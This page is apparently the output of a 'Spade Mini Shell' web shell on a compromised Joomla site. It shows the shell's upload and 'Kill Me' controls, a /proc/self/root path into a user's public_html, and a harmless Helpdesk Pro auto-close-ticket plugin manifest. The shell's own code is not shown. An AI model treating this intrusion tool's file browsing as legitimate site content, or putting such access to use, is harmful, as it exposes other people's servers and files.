Spade

Mini Shell

Directory:~$ /proc/self/root/home/lmsyaran/public_html/plugins/system/autocloseticket/
Upload File

[Home] [System Details] [Kill Me]
Current File:~$ //proc/self/root/home/lmsyaran/public_html/plugins/system/autocloseticket/autocloseticket.xml

<?xml version="1.0" encoding="utf-8"?>
<extension version="3.0.0" type="plugin"
group="system" method="upgrade">
	<name>System - Helpdeskpro Auto Close Ticket</name>
	<author>Tuan Pham Ngoc</author>
	<authorEmail>tuanpn@joomdonation.com</authorEmail>
	<authorUrl>http://www.joomdonation.com</authorUrl>
	<copyright>Copyright (C) 2013 - 2020 Ossolution
Team</copyright>
	<license>GNU General Public License version 3, or
later</license>
	<creationDate>Jan 2017</creationDate>
	<version>4.3.0</version>
	<description></description>
	<files>
		<filename
plugin="autocloseticket">autocloseticket.php</filename>		
	</files>
	<config>
		<fields name="params">
			<fieldset name="basic">
				<field name="number_days" type="text"
size="60" default="14" label="Number Days"
description="Enter number days the tickets will be closed if there are
no activities on the ticket" />
				<field name="last_run" label="Last Run Time"
type="text" readonly="true" size="30"
description="Store Last Run Time of the
plugin"></field>
			</fieldset>
		</fields>
	</config>
</extension>